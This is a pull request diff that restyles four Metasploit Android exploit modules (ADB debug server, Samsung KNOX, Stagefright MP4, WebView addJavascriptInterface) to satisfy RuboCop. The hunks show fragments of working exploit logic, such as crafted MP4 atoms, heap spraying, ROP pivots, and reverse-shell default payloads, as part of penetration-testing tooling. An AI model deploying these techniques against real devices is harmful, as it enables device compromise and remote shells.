### PR TITLE
modules/exploits/android: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/android/adb/adb_server_exec.rb
+++ b/modules/exploits/android/adb/adb_server_exec.rb
@@ -10,26 +10,34 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
-      'Description'    => %q{
-        Writes and spawns a native payload on an android device that is listening
-        for adb debug messages.
-      },
-      'Author'         => ['joev'],
-      'License'        => MSF_LICENSE,
-      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
-      'Platform'       => 'linux',
-      'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
-      'Targets'        => [
-        ['armle',  {'Arch' => ARCH_ARMLE}],
-        ['x86',    {'Arch' => ARCH_X86}],
-        ['x64',    {'Arch' => ARCH_X64}],
-        ['mipsle', {'Arch' => ARCH_MIPSLE}]
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2016-01-01'
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Android ADB Debug Server Remote Payload Execution',
+        'Description' => %q{
+          Writes and spawns a native payload on an Android device that is listening
+          for adb debug messages.
+        },
+        'Author' => ['joev'],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
+        'Platform' => 'linux',
+        'Arch' => [ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+        'Targets' => [
+          ['armle', { 'Arch' => ARCH_ARMLE }],
+          ['x86', { 'Arch' => ARCH_X86 }],
+          ['x64', { 'Arch' => ARCH_X64 }],
+          ['mipsle', { 'Arch' => ARCH_MIPSLE }]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2016-01-01',
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(5555),
@@ -40,28 +48,28 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     setup_adb_connection do
       device_info = @adb_client.connect.data
-      print_good "Detected device:\n#{device_info}"
-      return Exploit::CheckCode::Vulnerable
+      print_good("Detected device:\n#{device_info}")
+      return CheckCode::Vulnerable
     end
 
-    Exploit::CheckCode::Unknown
+    CheckCode::Unknown
   end
 
-  def execute_command(cmd, opts)
+  def execute_command(cmd, _opts)
     response = @adb_client.exec_cmd(cmd)
-    print_good "Command executed, response:\n #{response}"
+    print_good("Command executed, response:\n #{response}")
   end
 
   def exploit
     setup_adb_connection do
       device_data = @adb_client.connect
-      print_good "Connected to device:\n#{device_data.data}"
+      print_good("Connected to device:\n#{device_data.data}")
       execute_cmdstager({
         flavor: :echo,
         enc_format: :octal,
         prefix: '\\\\0',
         temp: datastore['WritableDir'],
-        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
+        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA - 8,
         background: true,
         nodelete: true
       })
@@ -69,13 +77,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def setup_adb_connection(&blk)
-    begin
-      print_status "Connecting to device..."
-      connect
-      @adb_client = Rex::Proto::ADB::Client.new(sock)
-      blk.call
-    ensure
-      disconnect
-    end
+    print_status('Connecting to device...')
+    connect
+    @adb_client = Rex::Proto::ADB::Client.new(sock)
+    blk.call
+  ensure
+    disconnect
   end
 end

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -15,43 +15,50 @@ class MetasploitModule < Msf::Exploit::Remote
   attr_reader :served_payloads
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
-      'Description'         => %q{
-        A vulnerability exists in the KNOX security component of the Samsung Galaxy
-        firmware that allows a remote webpage to install an APK with arbitrary
-        permissions by abusing the 'smdm://' protocol handler registered by the KNOX
-        component.
+    super(
+      update_info(
+        info,
+        'Name' => 'Samsung Galaxy KNOX Android Browser RCE',
+        'Description' => %q{
+          A vulnerability exists in the KNOX security component of the Samsung Galaxy
+          firmware that allows a remote webpage to install an APK with arbitrary
+          permissions by abusing the 'smdm://' protocol handler registered by the KNOX
+          component.
 
-        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
-        and Ace 4.
-      },
-      'License'             => MSF_LICENSE,
-      'Author'              => [
-        'Andre Moulu', # discovery, advisory, and exploitation help
-        'jduck', # msf module
-        'joev'   # msf module
-      ],
-      'References'          => [
-        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
-        ['OSVDB', '114590']
-      ],
-      'Platform'            => 'android',
-      'Arch'                => ARCH_DALVIK,
-      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
-      'Targets'             => [ [ 'Automatic', {} ] ],
-      'DisclosureDate'      => '2014-11-12',
-      'DefaultTarget'       => 0,
-
-      'BrowserRequirements' => {
-        :source     => 'script',
-        :os_name    => OperatingSystems::Match::ANDROID
-      }
-    ))
+          The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
+          and Ace 4.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Andre Moulu', # discovery, advisory, and exploitation help
+          'jduck', # msf module
+          'joev'   # msf module
+        ],
+        'References' => [
+          ['URL', 'https://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
+          ['OSVDB', '114590']
+        ],
+        'Platform' => 'android',
+        'Arch' => ARCH_DALVIK,
+        'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+        'Targets' => [ [ 'Automatic', {} ] ],
+        'DisclosureDate' => '2014-11-12',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'BrowserRequirements' => {
+          source: 'script',
+          os_name: OperatingSystems::Match::ANDROID
+        }
+      )
+    )
 
     register_options([
       OptString.new('APK_VERSION', [
-        false, "The update version to advertise to the client", "1337"
+        false, 'The update version to advertise to the client', '1337'
       ])
     ])
 
@@ -68,13 +75,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, req)
-    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
+    if req.uri =~ %r{/([a-zA-Z0-9]+)\.apk/latest$}
       if req.method.upcase == 'HEAD'
-        print_status "Serving metadata..."
+        print_status 'Serving metadata...'
         send_response(cli, '', magic_headers)
       else
-        print_status "Serving payload '#{$1}'..."
-        @served_payloads[$1] = 1
+        print_status "Serving payload '#{::Regexp.last_match(1)}'..."
+        @served_payloads[::Regexp.last_match(1)] = 1
         send_response(cli, apk_bytes, magic_headers)
       end
     elsif req.uri =~ /_poll/
@@ -88,31 +95,33 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # The browser appears to be vulnerable, serve the exploit
-  def on_request_exploit(cli, req, browser)
-    print_status "Serving exploit..."
+  def on_request_exploit(cli, _req, _browser)
+    print_status 'Serving exploit...'
     send_response_html(cli, generate_html)
   end
 
   def magic_headers
-    { 'Content-Length' => apk_bytes.length,
+    {
+      'Content-Length' => apk_bytes.length,
       'ETag' => Digest::MD5.hexdigest(apk_bytes),
-      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
+      'x-amz-meta-apk-version' => datastore['APK_VERSION']
+    }
   end
 
   def generate_html
-    %Q|
+    %(
       <!doctype html>
       <html><body>
       <script>
       #{exploit_js}
       </script></body></html>
-    |
+    )
   end
 
   def exploit_js
     payload_id = rand_word
 
-    js_obfuscate %Q|
+    js_obfuscate %|
 
       function poll() {
         var xhr = new XMLHttpRequest();
@@ -158,6 +167,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def rand_word
-    Rex::Text.rand_text_alphanumeric(3+rand(12))
+    Rex::Text.rand_text_alphanumeric(3..12)
   end
 end

--- a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb
+++ b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb
@@ -9,67 +9,66 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Android Stagefright MP4 tx3g Integer Overflow",
-      'Description'    => %q{
+  # rubocop:disable Metrics/MethodLength
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Stagefright MP4 tx3g Integer Overflow',
+        'Description' => %q{
           This module exploits an integer overflow vulnerability in the Stagefright
-        Library (libstagefright.so). The vulnerability occurs when parsing specially
-        crafted MP4 files. While a wide variety of remote attack vectors exist, this
-        particular exploit is designed to work within an HTML5 compliant browser.
+          Library (libstagefright.so). The vulnerability occurs when parsing specially
+          crafted MP4 files. While a wide variety of remote attack vectors exist, this
+          particular exploit is designed to work within an HTML5 compliant browser.
 
           Exploitation is done by supplying a specially crafted MP4 file with two
-        tx3g atoms that, when their sizes are summed, cause an integer overflow when
-        processing the second atom. As a result, a temporary buffer is allocated
-        with insufficient size and a memcpy call leads to a heap overflow.
+          tx3g atoms that, when their sizes are summed, cause an integer overflow when
+          processing the second atom. As a result, a temporary buffer is allocated
+          with insufficient size and a memcpy call leads to a heap overflow.
 
           This version of the exploit uses a two-stage information leak based on
-        corrupting the MetaData that the browser reads from mediaserver. This method
-        is based on a technique published in NorthBit's Metaphor paper. First,
-        we use a variant of their technique to read the address of a heap buffer
-        located adjacent to a SampleIterator object as the video HTML element's
-        videoHeight. Next, we read the vtable pointer from an empty Vector within
-        the SampleIterator object using the video element's duration. This gives
-        us a code address that we can use to determine the base address of
-        libstagefright and construct a ROP chain dynamically.
+          corrupting the MetaData that the browser reads from mediaserver. This method
+          is based on a technique published in NorthBit's Metaphor paper. First,
+          we use a variant of their technique to read the address of a heap buffer
+          located adjacent to a SampleIterator object as the video HTML element's
+          videoHeight. Next, we read the vtable pointer from an empty Vector within
+          the SampleIterator object using the video element's duration. This gives
+          us a code address that we can use to determine the base address of
+          libstagefright and construct a ROP chain dynamically.
 
-        NOTE: the mediaserver process on many Android devices (Nexus, for example) is
-        constrained by SELinux and thus cannot use the execve system call. To avoid
-        this problem, the original exploit uses a kernel exploit payload that disables
-        SELinux and spawns a shell as root. Work is underway to make the framework
-        more amenable to these types of situations. Until that work is complete, this
-        exploit will only yield a shell on devices without SELinux or with SELinux in
-        permissive mode.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          NOTE: the mediaserver process on many Android devices (Nexus, for example) is
+          constrained by SELinux and thus cannot use the execve system call. To avoid
+          this problem, the original exploit uses a kernel exploit payload that disables
+          SELinux and spawns a shell as root. Work is underway to make the framework
+          more amenable to these types of situations. Until that work is complete, this
+          exploit will only yield a shell on devices without SELinux or with SELinux in
+          permissive mode.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           # Exodus/jordan # initial discovery / disclosure
-          'jduck',     # Metasploit module, further infoleak development
-          'NorthBit'   # intiial information leak implementation
+          'jduck', # Metasploit module, further infoleak development
+          'NorthBit' # initial information leak implementation
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2015-3864' ],
           [ 'URL', 'https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/' ],
-          [ 'URL', 'http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2015/09/stagefrightened.html' ],
           [ 'URL', 'https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf' ],
           [ 'URL', 'https://github.com/NorthBit/Metaphor' ],
           # Not used, but related
-          [ 'URL', 'http://drops.wooyun.org/papers/7558' ],
-          [ 'URL', 'http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html' ],
-          [ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/' ],
+          [ 'URL', 'https://web.archive.org/web/20160115042350/http://drops.wooyun.org/papers/7558' ],
+          [ 'URL', 'https://web.archive.org/web/20160331185650/http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html' ],
+          [ 'URL', 'https://web.archive.org/web/20160304015534/https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/' ],
         ],
-      'Payload'        =>
-        {
-          'Space'    => 2048,
-          'DisableNops' => true,
+        'Payload' => {
+          'Space' => 2048,
+          'DisableNops' => true
         },
-      #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' },
-      'Platform'       => 'linux',
-      'Arch'           => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X64, ARCH_MIPSLE],
-      'Targets'        =>
-        [
+        # 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' },
+        'Platform' => 'linux',
+        'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+        'Targets' => [
           [ 'Automatic', {} ],
           #
           # Each target includes information about the device, firmware, and
@@ -344,22 +343,19 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2015-08-13',
-      'DefaultTarget'  => 0,
-      'Notes' =>
-          {
-              'AKA' => ['stagefright']
-          }
-      ))
-
-=begin
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ])
-=end
+        'Privileged' => true,
+        'DisclosureDate' => '2015-08-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['stagefright'],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ]
+        }
+      )
+    )
   end
+  # rubocop:enable Metrics/MethodLength
 
   def exploit
     @peers = {}
@@ -368,10 +364,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_target(request)
     agent = request.headers['User-Agent']
-    self.targets.each do |t|
+    targets.each do |t|
       next if t.name == 'Automatic'
+
       regexp = Regexp.escape("Linux; Android #{t['Release']}; #{t['Model']} Build/#{t['Build']}")
-      return t if (agent =~ /#{regexp}/)
+      return t if agent =~ /#{regexp}/
     end
     return nil
   end
@@ -395,8 +392,8 @@ class MetasploitModule < Msf::Exploit::Remote
     vector_ptr = peer[:vector_vtable_addr]
     libsf_base = (vector_ptr & 0xfffff000) - (vector_rva & 0xfffff000)
 
-    # If we smash mDataSource, this ends up controlling the program counter!!
 =begin
+    # If we smash mDataSource, this ends up controlling the program counter!!
     0xb65fd7c4 <parseChunk(long long*, int)+4596>:      ldr     r2, [r0, #0]
     0xb65fd7c6 <parseChunk(long long*, int)+4598>:      str     r1, [sp, #0]
     0xb65fd7c8 <parseChunk(long long*, int)+4600>:      ldr     r5, [r7, #0]
@@ -431,7 +428,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_ptr = spray_addr + 0xa0
 
     # Put the stack back!
-    stack_fix = "\x0a\xd0\xa0\xe1"  # mov sp, r10 ; restore original sp
+    stack_fix = "\x0a\xd0\xa0\xe1" # mov sp, r10 ; restore original sp
 
     # Depending on the pivot strategy in use, we have to set things up slightly
     # differently...
@@ -465,7 +462,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
 
     when 'lmy-2'
-      ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18  # adjust for displacement
+      ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18 # adjust for displacement
       addroffs = [
         [ 0x0, ptr_to_mds_pivot2 ],
         [ 0x8, new_sp ],
@@ -474,7 +471,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [ 0x1c, mds_pivot1 ]
       ]
 
-      stack_fix = "\x09\xd0\xa0\xe1"  # mov sp, r9 ; restore original sp
+      stack_fix = "\x09\xd0\xa0\xe1" # mov sp, r9 ; restore original sp
 
     when 'lyz'
       ptr_to_mds_pivot2 = spray_addr + 0x8
@@ -488,7 +485,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
 
       # We can't fix it becuse we don't know where the original stack is anymore :-/
-      stack_fix = ""
+      stack_fix = ''
 
     when 'sm-g900v'
       addroffs = [
@@ -504,7 +501,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # We need our ROP to build the page... Create it.
-    rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, {'base' => libsf_base, 'target' => my_target['Rop'] })
+    rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, { 'base' => libsf_base, 'target' => my_target['Rop'] })
 
     # Fix up the payload pointer in the ROP
     idx = rop.index([ 0xc600613c ].pack('V'))
@@ -515,14 +512,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Insert the special values...
     addroffs.each do |ao|
-      off,addr = ao
-      page[off,4] = [ addr ].pack('V')
+      off, addr = ao
+      page[off, 4] = [ addr ].pack('V')
 
       # Sometimes the spray isn't aligned perfectly...
       if addr == new_sp
-        page[off+unalign_off,4] = [ new_sp2 ].pack('V')
+        page[off + unalign_off, 4] = [ new_sp2 ].pack('V')
       else
-        page[off+unalign_off,4] = [ addr ].pack('V')
+        page[off + unalign_off, 4] = [ addr ].pack('V')
       end
     end
 
@@ -532,21 +529,22 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # MPEG-4 specific functionality
   #
-  def get_atom(tag, data='', length=nil)
+  def get_atom(tag, data = '', length = nil)
     if tag.length != 4
-        raise 'Yo! They call it "FourCC" for a reason.'
+      raise 'Yo! They call it "FourCC" for a reason.'
     end
 
     length ||= data.length + 8
     if length >= 2**32
       return [ [ 1 ].pack('N'), tag, [ length ].pack('Q>'), data ].join
     end
+
     [ [ length ].pack('N'), tag, data ].join
   end
 
   def get_stsc(num)
-    stsc_data = [ 0, num ].pack('N*')  # version/flags, mNumSampleToChunkOffsets
-    stsc_data << [ 13+1, 0x5a5a5a5a, 37 ].pack('N*') * num
+    stsc_data = [ 0, num ].pack('N*') # version/flags, mNumSampleToChunkOffsets
+    stsc_data << [ 13 + 1, 0x5a5a5a5a, 37 ].pack('N*') * num
     get_atom('stsc', stsc_data)
   end
 
@@ -565,7 +563,7 @@ class MetasploitModule < Msf::Exploit::Remote
     pssh_data << [ 0, 0, 0, 0 ].pack('N*')
     pssh_data << [ alloc_size ].pack('N')
     alloc_size.times do |off|
-      pssh_data << [ 0x55aa0000 + off ] .pack('V')
+      pssh_data << [ 0x55aa0000 + off ].pack('V')
     end
     get_atom('pssh', pssh_data)
   end
@@ -587,10 +585,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def jemalloc_round(sz)
     # These are in the 16-byte aligned runs
-    if (sz > 0x10 && sz <= 0x80)
+    if sz > 0x10 && sz <= 0x80
       round = 16
     # 160 starts the 32-byte aligned runs
-    elsif (sz > 0x80 && sz <= 0x140)
+    elsif sz > 0x80 && sz <= 0x140
       round = 32
     else
       raise "Don't know how to round 0x%x" % sz
@@ -616,10 +614,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
     #
     sampiter_alloc_size = 0x78
-    sampiter_alloc_size = my_target['SampleIteratorSize'] if not my_target['SampleIteratorSize'].nil?
+    sampiter_alloc_size = my_target['SampleIteratorSize'] if !my_target['SampleIteratorSize'].nil?
     sampiter_rounded = jemalloc_round(sampiter_alloc_size)
     vector_alloc_size = 0x8c
-    vector_alloc_size = my_target['VectorSize'] if not my_target['VectorSize'].nil?
+    vector_alloc_size = my_target['VectorSize'] if !my_target['VectorSize'].nil?
     groom_count = 0x10
 
     is_samsung = (my_target['Rop'] == 'sm-g900v / OE1')
@@ -647,7 +645,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # NOTE: hvcC added in 3b5a6b9fa6c6825a1d0b441429e2bb365b259827 (5.0.0 and later only)
     # avcC was in the initial commit.
-    near_sampiter = get_atom('hvcC', "C" * sampiter_alloc_size)
+    near_sampiter = get_atom('hvcC', 'C' * sampiter_alloc_size)
 
     # Craft the data that will overwrite the header and part of the MetaData
     # array...
@@ -679,7 +677,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # NOTE: We only use the first 12 bytes so that we don't overwrite the
       # pointer that is already there!
       heig = get_metaitem('heig', 'in32', 31338)
-      more_data << heig[0,12]
+      more_data << heig[0, 12]
     else
       # Part 2. Read from the specified address, as with the original Metaphor
       # exploit.
@@ -692,7 +690,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # On Nexus:
         # Before: avcc, heig, inpS, mime, text, widt
         # After:  dura, ...
-        near_sampiter = get_atom('avcC', "C" * sampiter_alloc_size)
+        near_sampiter = get_atom('avcC', 'C' * sampiter_alloc_size)
       end
 
       # Try to read the mCurrentChunkSampleSizes vtable ptr within a
@@ -736,8 +734,8 @@ class MetasploitModule < Msf::Exploit::Remote
     mp4v_data << [ 0 ].pack('C') * 24 # padding
     mp4v_data << [ 1024 ].pack('n')   # width
     mp4v_data << [ 768 ].pack('n')    # height
-    mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length)  # padding
-    trak_data << get_atom('mp4v', mp4v_data)  # satisfy hasVideo = true
+    mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length) # padding
+    trak_data << get_atom('mp4v', mp4v_data) # satisfy hasVideo = true
 
     # Here, we cause allocations such that we can replace the placeholder...
     if is_samsung
@@ -785,7 +783,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # end up smashing the temporary buffer further...
 
     chunks = []
-    chunks << get_ftyp()
+    chunks << get_ftyp
     chunks << get_atom('moov')
     chunks << verified_trak * 0x200
     chunks << shape_vector * groom_count
@@ -805,7 +803,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
     #
     chunks = []
-    chunks << get_ftyp()
+    chunks << get_ftyp
 
     # Note, this causes a few allocations
     moov_data = ''
@@ -828,7 +826,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # has proven to be fairly predictable (99%). However, it does vary from
     # one device to the next (probably determined by the pre-loaded libraries).
     spray_addr = 0xb0c08000
-    spray_addr = my_target['SprayAddress'] if not my_target['SprayAddress'].nil?
+    spray_addr = my_target['SprayAddress'] if !my_target['SprayAddress'].nil?
 
     # Construct a single page that we will spray
     page = build_spray(my_target, peer, spray_addr)
@@ -843,8 +841,8 @@ class MetasploitModule < Msf::Exploit::Remote
     tkhd1 = ''
     tkhd1 << [ 0 ].pack('C')  # version
     tkhd1 << 'D' * 3          # padding
-    tkhd1 << 'E' * (5*4)      # {c,m}time, id, ??, duration
-    tkhd1 << 'F' * 0x10       # ??
+    tkhd1 << 'E' * (5 * 4) # {c,m}time, id, ??, duration
+    tkhd1 << 'F' * 0x10 # ??
     tkhd1 << [
       0x10000,  # a00
       0,        # a01
@@ -853,7 +851,7 @@ class MetasploitModule < Msf::Exploit::Remote
       0x10000,  # a11
       0         # dy
     ].pack('N*')
-    tkhd1 << 'G' * 0x14       # ??
+    tkhd1 << 'G' * 0x14 # ??
 
     # Add the tkhd (track header) to the nasty track
     trak1 = ''
@@ -923,7 +921,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if request.uri =~ /\.mp4\?/i
       mp4_fn = request.uri.split('/')[-1]
       mp4_fn = mp4_fn.split('?')[0]
-      mp4_fn[-4,4] = ''
+      mp4_fn[-4, 4] = ''
 
       peer = @peers[mp4_fn]
 
@@ -946,14 +944,14 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # Always use this header
-      out_hdrs = {'Content-Type'=>'video/mp4'}
+      out_hdrs = { 'Content-Type' => 'video/mp4' }
 
       if peer[:vector_vtable_addr].nil?
         # Generate the nasty MP4 to leak infoz
-        mode = "infoleak"
+        mode = 'infoleak'
         mp4 = get_mp4_leak(my_target, peer)
       else
-        mode = "RCE"
+        mode = 'RCE'
         mp4 = get_mp4_rce(my_target, peer)
         if mp4.nil?
           send_not_found(cli)
@@ -963,21 +961,24 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # Send the nasty MP4 file to trigger the vulnerability
-      if request.headers['Accept-Encoding'] and request.headers['Accept-Encoding'].include? 'gzip'
+      if request.headers['Accept-Encoding'] && request.headers['Accept-Encoding'].include?('gzip')
         mp4 = Rex::Text.gzip(mp4)
         out_hdrs.merge!('Content-Encoding' => 'gzip')
         gzip = "gzip'd"
       else
-        gzip = "raw"
+        gzip = 'raw'
       end
 
-      client = "Browser"
+      client = 'Browser'
       if request.headers['User-Agent'].include? 'stagefright'
-        client = "SF"
+        client = 'SF'
       end
 
-      addrs = "heap: 0x%x, code: 0x%x" % [ peer[:near_sampiter_addr].to_i, peer[:vector_vtable_addr].to_i ]
-
+      addrs = format(
+        'heap: 0x%<near_sampiter_addr>x, code: 0x%<vector_vtable_addr>x',
+        near_sampiter_addr: peer[:near_sampiter_addr].to_i,
+        vector_vtable_addr: peer[:vector_vtable_addr].to_i
+      )
       print_status("Sending #{mode} #{gzip} MPEG4 (#{mp4.length} bytes) to #{cli.peerhost}:#{cli.peerport}... (#{addrs} from #{client})")
 
       # Send the nastiness!
@@ -1002,11 +1003,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Save the target for when they come back asking for this file
     # Also initialize the leak address to the first one
-    @peers[mp4_fn] = { :target => my_target }
+    @peers[mp4_fn] = { target: my_target }
 
     # Send the index page
     mp4_uri = "#{get_resource.chomp('/')}/#{mp4_fn}.mp4"
-    html = %Q^<html>
+    html = %^<html>
 <head>
 <title>Please wait...</title>
 <script>
@@ -1153,7 +1154,7 @@ Please wait while we locate your content...
 </html>
 ^
     print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
-    send_response(cli, html, {'Content-Type'=>'text/html'})
+    send_response(cli, html, { 'Content-Type' => 'text/html' })
   end
 
   #

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -11,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::BrowserAutopwn
   include Msf::Exploit::Android
 
-  VULN_CHECK_JS = %Q|
+  VULN_CHECK_JS = %|
     for (i in top) {
       try {
         top[i].getClass().forName('java.lang.Runtime');
@@ -21,20 +20,22 @@ class MetasploitModule < Msf::Exploit::Remote
   |
 
   autopwn_info(
-    :os_name    => OperatingSystems::Match::ANDROID,
-    :arch       => ARCH_ARMLE,
-    :javascript => true,
-    :rank       => ExcellentRanking,
-    :vuln_test  => VULN_CHECK_JS
+    os_name: OperatingSystems::Match::ANDROID,
+    arch: ARCH_ARMLE,
+    javascript: true,
+    rank: ExcellentRanking,
+    vuln_test: VULN_CHECK_JS
   )
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'                => 'Android Browser and WebView addJavascriptInterface Code Execution',
-      'Description'         => %q{
-            This module exploits a privilege escalation issue in Android < 4.2's WebView component
-          that arises when untrusted Javascript code is executed by a WebView that has one or more
-          Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
+        'Description' => %q{
+          This module exploits a privilege escalation issue in Android < 4.2's WebView component
+          that arises when untrusted JavaScript code is executed by a WebView that has one or more
+          Interfaces added to it. The untrusted JavaScript code can call into the Java Reflection
           APIs exposed by the Interface and execute arbitrary commands.
 
           Some distributions of the Android Browser app have an addJavascriptInterface
@@ -48,36 +49,42 @@ class MetasploitModule < Msf::Exploit::Remote
           by this module and get a shell.
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
-      },
-      'License'             => MSF_LICENSE,
-      'Author'              => [
-        'jduck', # original msf module
-        'joev'   # static server
-      ],
-      'References'          => [
-        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
-        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
-        ['URL', 'http://50.56.33.56/blog/?p=314'],
-        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
-        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
-        ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
-        ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
-        ['EDB', '31519'],
-        ['OSVDB', '97520']
-      ],
-      'Platform'            => ['android', 'linux'],
-      'Arch'                => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
-      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
-      'Targets'             => [ [ 'Automatic', {} ] ],
-      'DisclosureDate'      => '2012-12-21',
-      'DefaultTarget'       => 0,
-      'BrowserRequirements' => {
-        :source     => 'script',
